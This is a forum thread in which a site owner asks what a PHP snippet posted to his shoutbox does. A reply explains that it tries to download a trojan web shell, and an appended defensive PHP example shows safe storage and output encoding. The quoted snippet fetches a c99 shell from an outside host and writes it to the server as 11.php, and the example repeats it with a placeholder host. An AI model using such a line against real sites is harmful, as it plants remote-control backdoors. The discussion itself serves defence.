Some joker posted this in my shoutbox on my homepage. What's he trying to do???

by Frankie Kam -
Number of replies: 2

Here's the code:

<? $z=fopen("11.php",'w');fwrite($z,file_get_contents("http://t00ls.org/c99.txt"));fclose($z); ?> (Tuesday, 10.05.11, 03:47 AM)

What was he trying to accomplish?

Frankie Kam

In reply to Frankie Kam

Re: Some joker posted this in my shoutbox on my homepage. What's he trying to do???

by Tim Hunt -

He is trying to download a trojan to your server, so that later he can go to the URL .../11.php to execute malicious stuff. However, that sort of thing will not work, providing you are not using a badly-implemented plugin that has security holes.

In reply to Tim Hunt

Re: Some joker posted this in my shoutbox on my homepage. What's he trying to do???

by Frankie Kam -

Thanks Tim

Now I know what his intentions are.

This time, I took evasive action. Since I don't know how to stop him from posting such code, I modified the PHP core code of the Shoutbox so that it will replace substring text with blanks. So fopen is replaced with blanks, for example.

Frankie Kam
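
An added example, not part of the thread and not the Shoutbox plugin's own code: a shoutbox that stores posts purely as data and encodes them on output leaves a posted string like the one above as inert text, and ordinary messages that mention fopen stay intact. The function names, the temp-file path and the placeholder host example.invalid are assumptions made for the illustration.

```php
<?php
// Added example: hypothetical shoutbox helpers, not the Shoutbox plugin's code.

// Constructed sample input: same shape as the post quoted in the thread,
// with the host replaced by a placeholder.
$posted = '<? $z=fopen("11.php",\'w\');'
        . 'fwrite($z,file_get_contents("http://example.invalid/c99.txt"));fclose($z); ?>';

/** Append a message as one JSON line to a data file.
 *  The file is only ever read as text: never include()d, require()d or eval()ed,
 *  and it must not carry an extension the web server hands to PHP. */
function shout_store(string $file, string $author, string $message): void
{
    $row = json_encode(['t' => time(), 'a' => $author, 'm' => $message]);
    file_put_contents($file, $row . "\n", FILE_APPEND | LOCK_EX);
}

/** Render stored messages as HTML; every user-supplied field is encoded on output. */
function shout_render(string $file): string
{
    $items = '';
    foreach (file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $line) {
        $row = json_decode($line, true);
        if (!is_array($row)) {
            continue; // skip corrupt lines
        }
        $items .= '<li><b>' . htmlspecialchars($row['a'], ENT_QUOTES, 'UTF-8') . '</b>: '
                . htmlspecialchars($row['m'], ENT_QUOTES, 'UTF-8') . "</li>\n";
    }
    return "<ul>\n" . $items . "</ul>\n";
}

/** Logging aid: flag posts containing a PHP open tag so an admin can review them.
 *  This is for visibility only; the protection is in how the text is stored and shown. */
function shout_looks_like_php(string $message): bool
{
    return (bool) preg_match('/<\?(php|=|\s)/i', $message);
}

$file = sys_get_temp_dir() . '/shoutbox-demo.jsonl';
@unlink($file);
shout_store($file, 'guest', $posted);
shout_store($file, 'frankie', 'How do I use fopen in my own plugin?');
echo shout_render($file);                 // both posts appear as plain, encoded text
var_dump(shout_looks_like_php($posted));  // flagged for admin review
```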